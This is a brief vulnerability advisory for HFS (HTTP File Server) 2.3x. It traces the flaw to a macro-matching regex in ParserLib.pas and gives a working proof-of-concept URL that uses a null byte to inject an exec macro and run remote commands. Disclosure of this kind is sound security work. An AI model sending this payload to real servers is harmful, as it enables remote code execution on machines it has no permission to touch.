Affected software: http://sourceforge.net/projects/hfs/
Version : 2.3x
issue exists due to a poor regex in the file ParserLib.pas
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
it will not handle null byte so a request to
http://localhost:80/search=%00{.exec|cmd.}
will stop regex from parse macro , and macro will be executed and remote code injection happen.